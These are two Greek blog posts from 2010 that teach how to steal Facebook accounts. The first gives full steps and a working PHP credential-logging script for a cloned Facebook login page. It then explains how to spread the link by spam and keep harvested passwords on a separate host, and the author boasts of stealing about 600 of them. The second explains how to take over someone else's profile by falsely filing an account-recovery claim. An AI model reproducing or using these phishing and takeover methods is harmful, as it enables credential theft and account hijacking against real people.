Τρίτη 9 Μαρτίου 2010

Ψαρέψτε κωδικούς από το Facebook

Ο ευκολότερος τρόπος να πάρουμε συγκεκριμένους ή πολλούς διαφορετικούς κωδικούς από το ΦατσοΜπουκ, είναι το "ψάρεμα" (Phishing). Τί σημαίνει αυτό? Αυτό σημαίνει ότι εμείς ρίχνουμε το δόλωμα, και τα ψάρια τσιμπάνε μουχαχαχαχα...

Το Phishing στην ουσία δεν είναι τίποτα περίπλοκο (εξαρτάται βέβαια από το πού θελουμε να ψαρέψουμε), είναι απλά μια μέθοδος που βασίζεται στην άγνοια και την απροσεξία του απλού χρήστη του ίντερνετ. Παντού υπάρχουν ζώα που δίνουν τους κωδικούς τους όπου τους ζητηθεί. Είχα την ευκαιρία να το αποδείξω στον εαυτό μου ψαρεύοντας πάνω κάτω 600 Φατσο-κωδικούς μέσα σε 5-6 μέρες. Οι 212 από αυτούς είναι εδώ και μήνες δημοσιευμένοι στο άλλο μου blog.

Αυτό που θα κάνουμε εδώ είναι το πιο απλό παράδειγμα Phishing, λόγο της απλότητας του Facebook. Πιο περίπλοκες σελίδες, στις οποίες πρέπει να ελέγχουμε για το αν τα στοιχεία που συλλέγουμε είναι σωστα (π.χ. PayPal), θέλουν δουλειά και γνωσεις. Προς το παρόν θα δούμε το Facebook και με τον καιρό θα φτάσουμε και στα "δύσκολα".

Τί χρειαζόμαστε για να ψαρέψουμε:

  • Μία ίδια σελίδα με το Facebook Login - την οποία θα φτιάξουμε σε λίγο
  • Έναν Web Hoster για να κάνουμε Upload το "δόλωμα" - ripway.com π.χ.
  • Ελάχιστη γνώση PHP/HTML - Θα σας δείξω εγώ τί και πώς, αλλά διαβάστε λίγο
  • Πολλούς Friends - Σχετικούς ή άσχετους. Φτιάξτε ένα προφίλ με φωτό γκόμενας anyway
  • Προαιρετικά Groups - Για πιο πολλούς targets
  • URL Rename/Shorten Service - Το οποίο να μην μπλοκάρει το Facebook (π.χ. .tk)
  • Καφέ από την Αφροδίτη και μπόλικο θράσσος

Αρχίζοντας:


Είπαμε και πριν ότι χρειαζόμαστε μία ίδια σελίδα με το ΦατσοΒιβλίο, άρα θα φτιάξουμε ένα πιστό αντίγραφο. Το όλο θέμα είναι να κάνουμε ενα Facebook (Στην όψη) το οποίο αντί να στέλνει το email και το password των θυμάτων στο Facebook, θα τα κρατάει σε ένα Text για εμάς και μετά... θα γυρίζει το θύμα στο κανονικό Facebook. Απλό δεν ακούγεται?


Φτιάχνοντας ένα απλό Phishing Page:


  1. Πηγαίνουμε στο facebook.com - ΔΕΝ ΚΑΝΟΥΜΕ LOGIN
  2. Κάνουμε SAVE την σελίδα που βλέπουμε - The WHOLE page (default)
  3. Ανοίγουμε Notepad και σέρνουμε μέσα την σελίδα που κάναμε Save
  4. Με CTRL+F (find) ψάχνουμε για "form" ή "action"
  5. Πρέπει να βρούμε την φόρμα που στέλνει τα στοιχεία (π.χ. action=www.facebook.com/login κλπ)
  6. Αλλάζουμε το facebook.com μέχρι το τέλος σε "eleos.php"
  7. Αλλάζουμε το METHOD της φόρμας από method=post σε method=get
  8. Κάνουμε SAVE στο Notepad και File -> New και γράφουμε το επόμενο Script


<?php
header("Location: http://www.facebook.com/profile.php?id=547627539&ref=nf");
$handle = fopen("kodikoi.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



 


Κάνουμε SAVE το Script σαν "eleos.php" στον ΙΔΙΟ φάκελο με την σελίδα μας... και έτοιμος ο Μπούμπης!!! Κάνουμε και ένα καινούριο Text με όνομα kodikoi.txt, το ρίχνουμε στον ίδιο φάκελο και τέλος....



Ανεβάζουμε ΌΛΑ τα αρχεία που έχουμε στο ripway, κάνουμε rename σε .tk... και είναι πλέον όλα έτοιμα ;)

Το μόνο που μένει τώρα είναι να το spammάρουμε στο Facebook και να περιμένουμε.


Last words:

Με αυτόν τον τρόπο τα LOGS μας δεν είναι και τόσο καθαρά. Δηλαδή δεν γράφονται ΜΟΝΟ το email και το password του χρήστη αλλά γράφεται όλη η φόρμα και ό,τι στέλνει αυτή. Μπορείτε να κρατάτε μόνο αυτά που θέλετε αν μάθετε να κάνετε handling απλών μεταβλητών. Επίσης, αντί να κρατάμε τα LOGS σε κείμενο, θα μπορούσαμε να έχουμε μια SQL Database σε ΑΛΛΟ Host έτσι ώστε αν μας διαγράψουν το Account να έχουμε ακόμη τα passwords. Και τέλος, μην κάνετε ΠΟΤΕ redirect κατευθείαν στο Facebook. Κάντε το όπως εγώ ----  http://www.facebook.com/profile.php?id=547627539&ref=nf



Happy Phishing...

Πέμπτη 4 Μαρτίου 2010

Πάρτε οποιοδήποτε Facebook Profile, σε 24 ώρες

Η μόνιμη ερώτηση που έχω στα αυτιά μου, είναι αν και πώς μπορεί κάποιος να "σπάσει" ένα Facebook προφίλ. Η σωστή ερώτηση θα ήταν... "ΜΠΟΡΕΙ κανείς να ΣΠΑΣΕΙ ένα προφίλ?". Σαφέστατα η απάντηση είναι ΟΧΙ και η δικαιολογία πολύ απλή.

Το Φατσοβιβλίο είναι πλέον μια ας την πούμε "Company", η οποία δίνει μερικά δισ.μυριάκια μόνο και μόνο για την ασφάλειά της, ΑΡΑ... το συμπέρασμα είναι ότι κανείς από εμάς δεν είναι εξυπνότερος από 500+ άτομα μαζί.

Κι όμως κι όμως κι όμως....
Υπάρχουν πολλοί τρόποι να "πάρουμε" είτε κωδικούς χρηστών, είτε ολόκληρα τα προφίλ τους, no matter what και τα μυαλά στις ΚΑΝΓΚΕΛΕΣ. Μερικά παραδείγματα...

  1. KeyLogging - Να παρακολουθούμε τί πληκτρολογεί ο χρήστης από μακριά
  2. Cache Dumping - Να "εξάγουμε" απο μακριά/τοπικά τους αποθηκευμένους κωδικούς
  3. Scam / Phishing - Να "ψαρέψουμε" τους κωδικούς του με "δικά μας" facebooks (fake)
  4. Ταρατα ΤΑΑΑΑΑΑΑ!!!! Το 4ο αναλυτικά... παρακάτω.

Ένα μεγάλο λάθος που έκανε το προσωπικό του ΦατσοΜΠΟΥΚ, είναι ότι δίνουν την επιλογή στον καθένα να ξαναπάρει το Account του πίσω σε περίπτωση που τον ..... "χακάρουν" (τσ τσ τσ τα κωλόπαιδα ρε ΓΑΜΩΤΟ). Αυτό που προφανώς δεν περνάει από το αμερικανικό και αντι-έξυπνο ανύπαρκτο κουρκούτι τους είναι ότι ο καθένας μπορεί να το παίξει "ΘΥΜΑ", με κάποιου άλλου το ΦατσοΛογαριασμό!!! ΦΟΡ ΦΑΚΣ ΣΕΗΚ!

Λέγεται "Reverting". (Γουγλήστε το για μετάφραση και θα καταλάβετε γιατί το λένε έτσι)

Reverting λοιπόν μπορεί να κάνει ο Κίτσος για το account του Μήτσου με απλά βήματα ως εξής.


  1. Ανοίγει το ΛΙΝΚ αυτό
  2. Δίνει το email του Μήτσου
  3. Στις τρεις ερωτήσεις απαντάει αντίστοιχα: ΟΧΙ , ΝΑΙ , ΝΑΙ
  4. Συμπληρώνει το πλήρες όνομα του Μήτσου (Ό,τι είχε ο Μήτσος στο ΦατσοΜΠΟΥΚ)
  5. Επιλέγει: ΟΧΙ
  6. Για contact email βάζει το brand-new mail του στο GMail (Π.Χ.)
  7. Το UserName κατά 99% δεν υπάρχει (κι αν υπάρχει το βλέπει εύκολα)
  8. Το Profile Page είναι αυτή η διεύθηνση που βλέπει όταν είναι στο προφίλ του Μήτσου
  9. Τέλος το Profile URL που μοιάζει με αυτό: /profile.php?ref=profile&id=15320023770114
  10. Πατάει το μαγικό κουμπάκι που λέει αποστολή or something.... καιιιιιι

ΤΑ ΡΑ ΤΑ ΤΑΑΑΑΑ ΤΑ ΤΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑΑ!!!!!!!!!!!!!


"Thanks, your inquiry has been forwarded to the Facebook Team."


...και περιμένει από μία μέχρι 24 ώρες βλέποντας Sex And The Facebook στο PC και ΡΟΥΦΩΝΤΑΣ μια 2λιτρη CocaCola... ρε το κωλόπαιδο τον Κίτσο!!! ΦΤΟΥ ΣΟΥ ΑΛΗΤΗ!

Enjoy... και Χάπι Χάξορινγκ.